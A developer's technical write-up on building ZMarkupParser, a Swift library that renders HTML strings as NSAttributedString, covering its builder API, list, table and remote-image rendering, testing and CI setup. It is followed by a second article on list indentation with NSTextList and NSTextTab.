+ }
+
+ currentMarkup = thisMarkup.parentMarkup
+ }
+
+ if var currentStyle = currentStyle {
+ currentStyle.fillIfNil(from: rootStyle)
+ return currentStyle
+ } else {
+ return rootStyle
+ }
+ }
+}
+
Corresponding implementation in the source code MarkupNSAttributedStringVisitor.swift
Operation process and result as shown in the figure
Finally, we can get:
Li{
+ NSColor = "Blue";
+ NSFont = "<UICTFont: 0x145d17600> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 13.00pt";
+ NSLink = "https://zhgchg.li";
+}nk{
+ NSColor = "Blue";
+ NSFont = "<UICTFont: 0x145d18710> font-family: \".SFUI-Semibold\"; font-weight: bold; font-style: normal; font-size: 13.00pt";
+ NSLink = "https://zhgchg.li";
+}Bold{
+ NSFont = "<UICTFont: 0x145d18710> font-family: \".SFUI-Semibold\"; font-weight: bold; font-style: normal; font-size: 13.00pt";
+}
+
🎉🎉🎉🎉Completed🎉🎉🎉🎉
At this point, we have completed the entire conversion process from HTML String to NSAttributedString.
Stripping HTML tags is relatively simple, just need to:
func attributedString(_ markup: Markup) -> NSAttributedString {
+ if let rawStringMarkup = markup as? RawStringMarkup {
+ return rawStringMarkup.attributedString
+ } else {
+ return markup.childMarkups.compactMap({ attributedString($0) }).reduce(NSMutableAttributedString()) { partialResult, attributedString in
+ partialResult.append(attributedString)
+ return partialResult
+ }
+ }
+}
+
Corresponding implementation in the source code MarkupStripperProcessor.swift
Similar to Render, but purely returns the content after finding RawStringMarkup.
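A hedged usage sketch (the ZHTMLParserBuilder / ZHTMLParser facade is introduced below):

// Sketch: the stripper returns only the text content, with all tags removed.
let parser = ZHTMLParserBuilder.initWithDefault().build()
let plainText = parser.stripper("<a href=\"https://zhgchg.li\">Li<b>nk</b></a><b>Bold</b>")
// plainText == "LinkBold"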
Since it is impossible to cover every HTML tag and style attribute out of the box, a dynamic extension point is provided, making it convenient to extend objects directly from code.
public struct ExtendTagName: HTMLTagName {
+ public let string: String
+
+ public init(_ w3cHTMLTagName: WC3HTMLTagName) {
+ self.string = w3cHTMLTagName.rawValue
+ }
+
+ public init(_ string: String) {
+ self.string = string.trimmingCharacters(in: .whitespacesAndNewlines).lowercased()
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+// to
+final class ExtendMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+//----
+
+public struct ExtendHTMLTagStyleAttribute: HTMLTagStyleAttribute {
+ public let styleName: String
+ public let render: ((String) -> (MarkupStyle?)) // Dynamically change MarkupStyle using closure
+
+ public init(styleName: String, render: @escaping ((String) -> (MarkupStyle?))) {
+ self.styleName = styleName
+ self.render = render
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagStyleAttributeVisitor {
+ return visitor.visit(self)
+ }
+}
+
Finally, we use the Builder Pattern to allow external Modules to quickly construct the objects required by ZMarkupParser and ensure Access Level Control.
public final class ZHTMLParserBuilder {
+
+ private(set) var htmlTags: [HTMLTag] = []
+ private(set) var styleAttributes: [HTMLTagStyleAttribute] = []
+ private(set) var rootStyle: MarkupStyle?
+ private(set) var policy: MarkupStylePolicy = .respectMarkupStyleFromCode
+
+ public init() {
+
+ }
+
+ public static func initWithDefault() -> Self {
+ var builder = Self.init()
+ for htmlTagName in ZHTMLParserBuilder.htmlTagNames {
+ builder = builder.add(htmlTagName)
+ }
+ for styleAttribute in ZHTMLParserBuilder.styleAttributes {
+ builder = builder.add(styleAttribute)
+ }
+ return builder
+ }
+
+ public func set(_ htmlTagName: HTMLTagName, withCustomStyle markupStyle: MarkupStyle?) -> Self {
+ return self.add(htmlTagName, withCustomStyle: markupStyle)
+ }
+
+ public func add(_ htmlTagName: HTMLTagName, withCustomStyle markupStyle: MarkupStyle? = nil) -> Self {
+ // Only one tagName can exist
+ htmlTags.removeAll { htmlTag in
+ return htmlTag.tagName.string == htmlTagName.string
+ }
+
+ htmlTags.append(HTMLTag(tagName: htmlTagName, customStyle: markupStyle))
+
+ return self
+ }
+
+ public func add(_ styleAttribute: HTMLTagStyleAttribute) -> Self {
+ styleAttributes.removeAll { thisStyleAttribute in
+ return thisStyleAttribute.styleName == styleAttribute.styleName
+ }
+
+ styleAttributes.append(styleAttribute)
+
+ return self
+ }
+
+ public func set(rootStyle: MarkupStyle) -> Self {
+ self.rootStyle = rootStyle
+ return self
+ }
+
+ public func set(policy: MarkupStylePolicy) -> Self {
+ self.policy = policy
+ return self
+ }
+
+ public func build() -> ZHTMLParser {
+ // ZHTMLParser init is only open for internal use, external cannot directly init
+ // Can only be initialized through ZHTMLParserBuilder
+ return ZHTMLParser(htmlTags: htmlTags, styleAttributes: styleAttributes, policy: policy, rootStyle: rootStyle)
+ }
+}
+
Corresponding implementation in ZHTMLParserBuilder.swift
initWithDefault will add all implemented HTMLTagName/Style Attribute by default
public extension ZHTMLParserBuilder {
+ static var htmlTagNames: [HTMLTagName] {
+ return [
+ A_HTMLTagName(),
+ B_HTMLTagName(),
+ BR_HTMLTagName(),
+ DIV_HTMLTagName(),
+ HR_HTMLTagName(),
+ I_HTMLTagName(),
+ LI_HTMLTagName(),
+ OL_HTMLTagName(),
+ P_HTMLTagName(),
+ SPAN_HTMLTagName(),
+ STRONG_HTMLTagName(),
+ U_HTMLTagName(),
+ UL_HTMLTagName(),
+ DEL_HTMLTagName(),
+ TR_HTMLTagName(),
+ TD_HTMLTagName(),
+ TH_HTMLTagName(),
+ TABLE_HTMLTagName(),
+ IMG_HTMLTagName(handler: nil),
+ // ...
+ ]
+ }
+}
+
+public extension ZHTMLParserBuilder {
+ static var styleAttributes: [HTMLTagStyleAttribute] {
+ return [
+ ColorHTMLTagStyleAttribute(),
+ BackgroundColorHTMLTagStyleAttribute(),
+ FontSizeHTMLTagStyleAttribute(),
+ FontWeightHTMLTagStyleAttribute(),
+ LineHeightHTMLTagStyleAttribute(),
+ WordSpacingHTMLTagStyleAttribute(),
+ // ...
+ ]
+ }
+}
+
ZHTMLParser's init is internal only; external code cannot initialize it directly and must go through ZHTMLParserBuilder.
ZHTMLParser encapsulates Render/Selector/Stripper operations:
public final class ZHTMLParser: ZMarkupParser {
+ let htmlTags: [HTMLTag]
+ let styleAttributes: [HTMLTagStyleAttribute]
+ let rootStyle: MarkupStyle?
+
+ internal init(...) {
+ }
+
+ // Get link style attributes
+ public var linkTextAttributes: [NSAttributedString.Key: Any] {
+ // ...
+ }
+
+ public func selector(_ string: String) -> HTMLSelector {
+ // ...
+ }
+
+ public func selector(_ attributedString: NSAttributedString) -> HTMLSelector {
+ // ...
+ }
+
+ public func render(_ string: String) -> NSAttributedString {
+ // ...
+ }
+
+ // Allow rendering of NSAttributedString within nodes using HTMLSelector results
+ public func render(_ selector: HTMLSelector) -> NSAttributedString {
+ // ...
+ }
+
+ public func render(_ attributedString: NSAttributedString) -> NSAttributedString {
+ // ...
+ }
+
+ public func stripper(_ string: String) -> String {
+ // ...
+ }
+
+ public func stripper(_ attributedString: NSAttributedString) -> NSAttributedString {
+ // ...
+ }
+
+ // ...
+}
+
Corresponding implementation in the original code ZHTMLParser.swift
The resulting NSAttributedString is most commonly displayed in a UITextView, but note: the style of links in a UITextView is controlled by its linkTextAttributes setting, not by the NSAttributedString.Key attributes, and individual links cannot be styled separately; this is why ZMarkupParser exposes linkTextAttributes.
public extension UITextView {
+ func setHtmlString(_ string: String, with parser: ZHTMLParser) {
+ self.setHtmlString(NSAttributedString(string: string), with: parser)
+ }
+
+ func setHtmlString(_ string: NSAttributedString, with parser: ZHTMLParser) {
+ self.attributedText = parser.render(string)
+ self.linkTextAttributes = parser.linkTextAttributes
+ }
+}
+public extension UILabel {
+ func setHtmlString(_ string: String, with parser: ZHTMLParser) {
+ self.setHtmlString(NSAttributedString(string: string), with: parser)
+ }
+
+ func setHtmlString(_ string: NSAttributedString, with parser: ZHTMLParser) {
+ let attributedString = parser.render(string)
+ attributedString.enumerateAttribute(NSAttributedString.Key.attachment, in: NSMakeRange(0, attributedString.string.utf16.count), options: []) { (value, effectiveRange, nil) in
+ guard let attachment = value as? ZNSTextAttachment else {
+ return
+ }
+
+ attachment.register(self)
+ }
+
+ self.attributedText = attributedString
+ }
+}
+
Therefore, by extending UIKit, external users only need to call setHtmlString() to complete the binding.
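A minimal usage sketch:

import UIKit

// Sketch: build the parser once and bind an HTML string to a UITextView.
let parser = ZHTMLParserBuilder.initWithDefault()
    .set(rootStyle: MarkupStyle(font: MarkupStyleFont(size: 13)))
    .build()

let textView = UITextView()
textView.setHtmlString("<a href=\"https://zhgchg.li\">Li<b>nk</b></a><b>Bold</b>", with: parser)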
Record of implementing list items.
Using <ol> / <ul> to wrap <li> in HTML to represent list items:
<ul>
+ <li>ItemA</li>
+ <li>ItemB</li>
+ <li>ItemC</li>
+ //...
+</ul>
+
Using the same parsing method as before, inside visit(_ markup: ListItemMarkup) we can look at the sibling list items to know the current item's index (thanks to converting to an AST).
func visit(_ markup: ListItemMarkup) -> Result {
+ let siblingListItems = markup.parentMarkup?.childMarkups.filter({ $0 is ListItemMarkup }) ?? []
+ let position = (siblingListItems.firstIndex(where: { $0 === markup }) ?? 0)
+}
+
NSParagraphStyle has an NSTextList object that can be used to display list items, but in practice the width of its whitespace cannot be customized (personally, I think the gap is too large), and if the text wraps at the whitespace between the bullet and the string, the layout looks a bit odd, as shown in the image below:
A better result can potentially be achieved by setting headIndent, firstLineHeadIndent, and NSTextTab, but testing shows that if the string is too long or the size changes, it still cannot present the result perfectly.
For now the result is merely acceptable: the list item marker string is composed manually and inserted in front of the content string.
We only use NSTextList.MarkerFormat to generate list item symbols, rather than directly using NSTextList.
For a list of supported list symbols, refer to: MarkupStyleList.swift
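A sketch of the idea (the actual mapping lives in MarkupStyleList.swift):

import UIKit

// Sketch: NSTextList is only used to produce the marker text; the marker is then
// prepended to the item string manually instead of relying on NSTextList layout.
let textList = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
let marker = textList.marker(forItemNumber: 3) // "3"
let itemLine = "\(marker). ItemC\n"            // inserted in front of the item's content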
Final display result of <ol> / <li>:
Similar to the implementation of list items, but for tables. Using <table> in HTML to create a table -> wrapping <tr> table rows -> wrapping <td>/<th> to represent table cells:
<table>
+ <tr>
+ <th>Company</th>
+ <th>Contact</th>
+ <th>Country</th>
+ </tr>
+ <tr>
+ <td>Alfreds Futterkiste</td>
+ <td>Maria Anders</td>
+ <td>Germany</td>
+ </tr>
+ <tr>
+ <td>Centro comercial Moctezuma</td>
+ <td>Francisco Chang</td>
+ <td>Mexico</td>
+ </tr>
+</table>
+
Testing shows that the native NSAttributedString.DocumentType.html uses the private macOS API NSTextBlock to complete the display, thus it can fully display the HTML table style and content.
A bit of cheating! We can't use a private API 🥲
func visit(_ markup: TableColumnMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ let siblingColumns = markup.parentMarkup?.childMarkups.filter({ $0 is TableColumnMarkup }) ?? []
+ let position = (siblingColumns.firstIndex(where: { $0 === markup }) ?? 0)
+
+ // Whether to specify the desired width externally, can set .max to not truncate string
+ var maxLength: Int? = markup.fixedMaxLength
+ if maxLength == nil {
+ // If not specified, find the string length of the same column in the first row as the max length
+ if let tableRowMarkup = markup.parentMarkup as? TableRowMarkup,
+ let firstTableRow = tableRowMarkup.parentMarkup?.childMarkups.first(where: { $0 is TableRowMarkup }) as? TableRowMarkup {
+ let firstTableRowColumns = firstTableRow.childMarkups.filter({ $0 is TableColumnMarkup })
+ if firstTableRowColumns.indices.contains(position) {
+ let firstTableRowColumnAttributedString = collectAttributedString(firstTableRowColumns[position])
+ let length = firstTableRowColumnAttributedString.string.utf16.count
+ maxLength = length
+ }
+ }
+ }
+
+ if let maxLength = maxLength {
+ // If the field exceeds maxLength, truncate the string
+ if attributedString.string.utf16.count > maxLength {
+ attributedString.mutableString.setString(String(attributedString.string.prefix(maxLength))+"...")
+ } else {
+ attributedString.mutableString.setString(attributedString.string.padding(toLength: maxLength, withPad: " ", startingAt: 0))
+ }
+ }
+
+ if position < siblingColumns.count - 1 {
+ // Add spaces as spacing, the width of the spacing can be specified externally
+ attributedString.append(makeString(in: markup, string: String(repeating: " ", count: markup.spacing)))
+ }
+
+ return attributedString
+ }
+
+ func visit(_ markup: TableRowMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ attributedString.append(makeBreakLine(in: markup)) // Add line break, for details refer to Source Code
+ return attributedString
+ }
+
+ func visit(_ markup: TableMarkup) -> Result {
+ let attributedString = collectAttributedString(markup)
+ attributedString.append(makeBreakLine(in: markup)) // Add line break, for details refer to Source Code
+ attributedString.insert(makeBreakLine(in: markup), at: 0) // Add line break, for details refer to Source Code
+ return attributedString
+ }
+
The final presentation effect is as follows:
not perfect, but acceptable.
Finally, let's talk about the biggest challenge: loading remote images into NSAttributedString.
HTML uses <img> to represent an image:
<img src="https://user-images.githubusercontent.com/33706588/219608966-20e0c017-d05c-433a-9a52-091bc0cfd403.jpg" width="300" height="125"/>
+
You can specify the desired display size through the width / height HTML attributes.
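A sketch of how those attributes could be turned into a target size (hypothetical helper, not the library's exact code):

import CoreGraphics

// Sketch (hypothetical helper): derive the target size from the <img> width/height attributes.
func imageSize(from attributes: [String: String]) -> CGSize? {
    guard let width = attributes["width"].flatMap(Double.init),
          let height = attributes["height"].flatMap(Double.init) else {
        return nil
    }
    return CGSize(width: width, height: height)
}

// imageSize(from: ["width": "300", "height": "125"]) -> CGSize(width: 300, height: 125)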
Displaying images in NSAttributedString is much more complicated than imagined; and there is no good implementation. Previously, when doing UITextView text wrapping, I encountered some pitfalls, but after researching again, I found that there is still no perfect solution.
For now, let’s ignore the issue that NSTextAttachment natively cannot reuse and release memory. We will first implement downloading images from remote and placing them into NSTextAttachment, then into NSAttributedString, and achieve automatic content updates.
This series of operations is split into another small project for better optimization and reuse in other projects in the future:
The implementation mainly follows the Asynchronous NSTextAttachments series of articles, but replaces the final content-update step (refreshing the UI after the download completes) and adds a Delegate/DataSource for external extension.
Operation flow and relationships are as shown in the figure above:
1. Use ZNSTextAttachment to package the imageURL, the placeholder image, and the size information to be displayed; the placeholder is shown first, and when image(forBounds:…) is called we start downloading the image data.
2. Once downloaded, wrap the data in a ZResizableNSTextAttachment and implement the custom image size logic in attachmentBounds(for:…).
3. Use the func replace(attachment: ZNSTextAttachment, to: ZResizableNSTextAttachment) method to replace the ZNSTextAttachment at its position with the ZResizableNSTextAttachment.
For detailed code, refer to the Source Code.
The reason for not using NSLayoutManager.invalidateLayout(forCharacterRange: range, actualCharacterRange: nil)
or NSLayoutManager.invalidateDisplay(forCharacterRange: range)
to refresh the UI is that the UI did not correctly display the update; since the Range is known, directly triggering the replacement of NSAttributedString ensures the UI is correctly updated.
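A hedged sketch of that replacement idea (names are illustrative; see the ZNSTextAttachment source for the real flow):

import UIKit

// Sketch: with the placeholder's character range known, swap it for the final attachment
// and reassign the attributed string so the UI redraws correctly.
func replaceAttachment(in textView: UITextView, at range: NSRange, with newAttachment: NSTextAttachment) {
    let mutable = NSMutableAttributedString(attributedString: textView.attributedText)
    mutable.replaceCharacters(in: range, with: NSAttributedString(attachment: newAttachment))
    textView.attributedText = mutable
}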
The final display result is as follows:
<span style="color:red">こんにちは</span>こんにちはこんにちは <br />
+<img src="https://user-images.githubusercontent.com/33706588/219608966-20e0c017-d05c-433a-9a52-091bc0cfd403.jpg"/>
+
In this project, in addition to writing Unit Tests, Snapshot Tests were also established for integration testing to facilitate comprehensive testing and comparison of the final NSAttributedString.
The main functional logic has UnitTests and integration tests. The final Test Coverage is around 85%.
We use the SnapshotTesting framework directly:
import SnapshotTesting
+// ...
+func testShouldKeppNSAttributedString() {
+ let parser = ZHTMLParserBuilder.initWithDefault().build()
+ let textView = UITextView()
+ textView.frame.size.width = 390
+ textView.isScrollEnabled = false
+ textView.backgroundColor = .white
+ textView.setHtmlString("html string...", with: parser)
+ textView.layoutIfNeeded()
+ assertSnapshot(matching: textView, as: .image, record: false)
+}
+// ...
+
Directly compare the final result to see if it meets expectations, ensuring that the integration adjustments are not abnormal.
Integrate Codecov.io (free for Public Repo) to evaluate Test Coverage. Just install the Codecov Github App & configure it.
After setting up Codecov <-> GitHub Repo, you can also add a codecov.yml configuration file to the root directory of the project:
comment: # this is a top-level key
+ layout: "reach, diff, flags, files"
+ behavior: default
+ require_changes: false # if true: only post the comment if coverage changes
+ require_base: no # [yes :: must have a base report to post]
+ require_head: yes # [yes :: must have a head report to post]
+
This enables the CI coverage results to be automatically posted as a comment on each PR after it is issued.
Github Action, CI integration: ci.yml
name: CI
+
+on:
+ workflow_dispatch:
+ pull_request:
+ types: [opened, reopened]
+ push:
+ branches:
+ - main
+
+jobs:
+ build:
+ runs-on: self-hosted
+ steps:
+ - uses: actions/checkout@v3
+ - name: spm build and test
+ run: |
+ set -o pipefail
+ xcodebuild test -workspace ZMarkupParser.xcworkspace -testPlan ZMarkupParser -scheme ZMarkupParser -enableCodeCoverage YES -resultBundlePath './scripts/TestResult.xcresult' -destination 'platform=iOS Simulator,name=iPhone 14,OS=16.1' build test | xcpretty
+ - name: Codecov
+ uses: codecov/codecov-action@v3.1.1
+ with:
+ xcode: true
+ xcode_archive_path: './scripts/TestResult.xcresult'
+
This configuration runs build and test whenever a PR is opened/reopened or a push is made to the main branch, and finally uploads the test coverage report to Codecov.
As for regular expressions, every time I use them I get a little better; not much regex was needed this time, but because I originally wanted to use a single regex to extract paired HTML tags, I also studied how to write one.
Some new cheat sheet notes learned this time…
- ?: allows ( ) to group a match without capturing it, e.g. (?:https?:\/\/)?(?:www\.)?example\.com will return the entire URL in https://www.example.com instead of https://, www
- .+? non-greedy match (returns the nearest match), e.g. <.+?> will return <a>, </a> in <a>test</a> instead of the entire string
- (?=XYZ) any string until the string XYZ appears; note that the similar [^XYZ] means any string until the character X or Y or Z appears, e.g. (?:__)(.+?(?=__))(?:__) (any string until __) will match test
- ?R recursively matches with the same rule, e.g. \((?:[^()]|((?R)))+\) will match (simple), (and(nested)), (nested) in (simple) (and(nested))
- ?<GroupName> … \k<GroupName> matches a previously named group, e.g. (?<tagName><a>).*(\k<GroupName>)
- (?(X)yes|no) matches yes if the X match result has a value (a group name can also be used), otherwise matches no; Swift does not support this yet
Other good articles on Regex:
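A quick Swift check of the non-greedy rule from the notes above, using NSRegularExpression:

import Foundation

// Sketch: verify the non-greedy pattern behavior with NSRegularExpression.
let html = "<a>test</a>"
let regex = try! NSRegularExpression(pattern: "<.+?>")
let matches = regex.matches(in: html, range: NSRange(html.startIndex..., in: html))
let tags = matches.compactMap { Range($0.range, in: html).map { String(html[$0]) } }
// tags == ["<a>", "</a>"]; with the greedy "<.+>" it would be ["<a>test</a>"]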
This is also my first time developing with SPM & Cocoapods… It’s quite interesting, SPM is really convenient; but if you encounter a situation where two projects depend on the same package, opening both projects at the same time will result in one of them not finding the package and failing to build…
ZMarkupParser has also been uploaded to CocoaPods, but I haven't tested whether it works properly there, because I'm using SPM 😝.
From actual development experience, I found ChatGPT most useful only for helping edit the README; in day-to-day development I haven't felt a significant impact yet. When asked mid-senior-level questions, it couldn't give a definite answer or even gave incorrect ones (I ran into some wrong regex rules), so in the end I still turned to Google for the correct answers.
Not to mention asking it to write code, unless it’s simple Code Gen Object; otherwise, don’t expect it to complete the entire tool architecture directly. (At least for now, it seems that Copilot might be more helpful for writing code)
However, it can provide a general direction for knowledge blind spots, allowing us to quickly get a rough idea of how certain things should be done. Sometimes, when the understanding is too low, it’s hard to quickly pinpoint the correct direction on Google, and that’s when ChatGPT is quite helpful.
After more than three months of research and development, I am exhausted, but I still need to declare that this approach is only a feasible result obtained after my research. It is not necessarily the best solution, and there may still be areas for optimization. This project is more like a starting point, hoping to get a perfect solution for Markup Language to NSAttributedString. Everyone is very welcome to contribute; many things still need the power of the community to be perfected.
Here are some areas that I think can still be improved as of now (2023/03/12); they will be recorded in the Repo later:
- Performance (vs. NSAttributedString.DocumentType.html): there is still much room for optimization; I believe it is definitely not as fast as XMLParser, and I hope one day it can reach the same performance while keeping the customization and automatic error correction.
- Supporting the !important functionality and enhancing the inheritance strategy of the abstract MarkupStyle.
Here are all the technical details and the journey of developing ZMarkupParser. It took me almost three months of after-work and weekend time, countless rounds of research and practice, writing tests, improving Test Coverage, and setting up CI; finally, there is a somewhat decent result. I hope this tool solves the same problems for others and that everyone can help make it even better.
It is currently applied in our company’s pinkoi.com iOS App version, and no issues have been found. 😄
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Implementing list indentation similar to HTML List OL/UL/LI using NSTextList or NSTextTab with NSAttributedString in iOS Swift
Previously, while developing my open-source project “ZMarkupParser,” a library for converting HTML strings into NSAttributedString objects, I needed to research and implement the use of NSAttributedString to handle various HTML components. During this process, I came across the .paragraphStyle: NSParagraphStyle attribute of NSAttributedString Attributes, specifically its textLists: [NSTextList] and tabStops: [NSTextTab] properties. These are two very obscure attributes with limited online resources.
When initially implementing HTML list indentation conversion, I found examples showing that these two attributes could be used to achieve this. Let’s first take a look at the nested tag structure of HTML list indentation:
<ul>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>
+ ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.
+ <ol>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ <li>ZMarkupParser is a pure-Swift library that helps you convert HTML strings into NSAttributedString with customized styles and tags.</li>
+ </ol>
+ </li>
+</ul>
+
Display effect in the browser:
As shown in the above image, the list supports multiple layers of nested structures and needs to be indented according to the level.
At that time, there were many other HTML tag conversion tasks that needed to be implemented, which was a lot of work. I quickly attempted to use NSTextList or NSTextTab to create the list indentation without delving deep into understanding. However, the results were not as expected - the spacing was too large, there was no alignment, multiple lines were misaligned, the nested structure was not clear, and spacing could not be controlled. After playing around with it for a while without finding a solution, I abandoned it and temporarily used a makeshift layout:
The above image effect is very poor because it was actually manually formatted using spaces and the symbol -
, without any indentation effect. The only advantage is that the spacing is composed of blank symbols, and the size can be controlled manually.
This matter was left unresolved, and I didn’t particularly work on it even after being open-sourced for over a year. It wasn’t until recently that I started receiving Issues requesting improvements to list conversion, and a developer provided a solution PR. By referencing the usage of NSParagraphStyle
in that PR, I was inspired once again. Researching NSTextList or NSTextTab could potentially allow for the perfect implementation of indented list functionality!
As usual, let's start with the final result image. In ZMarkupParser v1.9.4 and above, HTML list items can be perfectly converted into NSAttributedString objects. The main text begins below.
It's “or” not “and” in the relationship between NSTextList and NSTextTab, meaning that these two attributes are not used together; each of them can achieve list indentation independently.
let textListLevel1 = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
+let textListLevel2 = NSTextList(markerFormat: .circle, startingItemNumber: 1)
+
+let listLevel1ParagraphStyle = NSMutableParagraphStyle()
+listLevel1ParagraphStyle.textLists = [textListLevel1]
+
+let listLevel2ParagraphStyle = NSMutableParagraphStyle()
+listLevel2ParagraphStyle.textLists = [textListLevel1, textListLevel2]
+
+let attributedString = NSMutableAttributedString()
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1))\tList Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 2))\tList Level 1 - 2\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 3))\tList Level 1 - 3\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 1))\tList Level 2 - 1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 2))\tList Level 2 - 2 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
+attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 4))\tList Level 1 - 4\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
+
+textView.attributedText = attributedString
+
Display Effect:
The Public API provided by NSTextList
is very limited, and the parameters that can be controlled are as follows:
// Item display style
+var markerFormat: NSTextList.MarkerFormat { get }
+
+// Starting number for ordered items
+var startingItemNumber: Int
+
+// Whether it is an ordered numeric item (available in iOS >= 16, surprisingly this API has been updated)
+@available(iOS 16.0, *)
+open var isOrdered: Bool { get }
+
+// Returns the item symbol string, with itemNumber as the item number. It can be omitted if it is a non-ordered numeric item
+open func marker(forItemNumber itemNumber: Int) -> String
+
NSTextList.MarkerFormat Styles:
Usage:
// Define a NSMutableParagraphStyle
+let listLevel1ParagraphStyle = NSMutableParagraphStyle()
+// Define List Item style, starting position of items
+let textListLevel1 = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
+// Assign NSTextList to the textLists array
+listLevel1ParagraphStyle.textLists = [textListLevel1]
+//
+NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1))\tItem One\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle])
+
+// Adding nested sub-items:
+// Define sub-item List Item style, starting position of items
+let textListLevel2 = NSTextList(markerFormat: .circle, startingItemNumber: 1)
+// Define sub-item NSMutableParagraphStyle
+let listLevel2ParagraphStyle = NSMutableParagraphStyle()
+// Assign parent and child NSTextList to the textLists array
+listLevel2ParagraphStyle.textLists = [textListLevel1, textListLevel2]
+
+NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 1))\tItem 1.1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle])
+
+// Sub-items of nested sub-items...
+// Continue appending NSTextList to the textLists arrays as needed
+
Usage notes:
- Use \n to differentiate each list item.
- You need to compose \t item symbol \t yourself to allow access to the list result when reading attributedString.string as plain text.
- In display, \t item symbol \t is not shown as typed, so any processing done after the item symbol will not be visible (e.g., adding . after the item number will not affect the display).
Issues with usage:
- There is no way to append . to numeric items -> 1. .
- If the parent items are symbol items (e.g., .circle) and the child items are ordered numeric items (e.g., .decimal), the startingItemNumber setting for the child items will be ignored.
What NSTextList can do and what it can be used for is as described above. However, it is not very user-friendly in practical product development: the spacing is too wide and numeric items lack ., which greatly reduces usability. Online, I only found a way to change the spacing through TextKit NSTextStorage, which I think is too hard-coded, so I abandoned it. The only benefit is that it allows simple nesting of indented sub-item lists by appending to the textLists array, without the need for complex layout calculations.
NSTextTab allows us to set the position of the \t tab placeholder, with a default interval of 28.
We achieve a list-like effect by setting tabStops + headIndent + defaultTabInterval in NSMutableParagraphStyle.
let textListLevel1 = NSTextList(markerFormat: .decimal, startingItemNumber: 1)
let textListLevel2 = NSTextList(markerFormat: .circle, startingItemNumber: 1)

let listLevel1ParagraphStyle = NSMutableParagraphStyle()
listLevel1ParagraphStyle.defaultTabInterval = 28
listLevel1ParagraphStyle.headIndent = 29
listLevel1ParagraphStyle.tabStops = [
    NSTextTab(textAlignment: .left, location: 8), // Corresponding settings as shown in figure (1) Location
    NSTextTab(textAlignment: .left, location: 29), // Corresponding settings as shown in figure (2) Location
]

let listLevel2ParagraphStyle = NSMutableParagraphStyle()
listLevel2ParagraphStyle.defaultTabInterval = 28
listLevel2ParagraphStyle.headIndent = 44
listLevel2ParagraphStyle.tabStops = [
    NSTextTab(textAlignment: .left, location: 29), // Corresponding settings as shown in figure (3) Location
    NSTextTab(textAlignment: .left, location: 44), // Corresponding settings as shown in figure (4) Location
]

let attributedString = NSMutableAttributedString()
attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 1)).\tList Level 1 - 1 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 2)).\tList Level 1 - 2\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 3)).\tList Level 1 - 3\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))
attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 1))\tList Level 2 - 1\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
attributedString.append(NSAttributedString(string: "\t\(textListLevel2.marker(forItemNumber: 2))\tList Level 2 - 2 StringStringStringStringStringStringStringStringStringStringStringString\n", attributes: [.paragraphStyle: listLevel2ParagraphStyle]))
attributedString.append(NSAttributedString(string: "\t\(textListLevel1.marker(forItemNumber: 4)).\tList Level 1 - 4\n", attributes: [.paragraphStyle: listLevel1ParagraphStyle]))

textView.attributedText = attributedString

- The tabStops array corresponds to each \t symbol in the text. NSTextTab can be set with an alignment direction and a Location position (please note that this sets the position in the text, not the width!).
- headIndent sets the starting position of the second line onward, usually set to the Location of the second \t, so that wrapped lines align with the item symbol.
- defaultTabInterval sets the default interval spacing for \t. If there are other \t in the text, they will be spaced according to this setting.
- location: because NSTextTab specifies direction and position, you need to calculate the position yourself: the width of the item symbol (the number of digits also matters) + spacing + the indentation distance of the parent item, to achieve the effect shown in the figure above.
- If a location is incorrect or cannot be satisfied, the text will simply break to a new line.

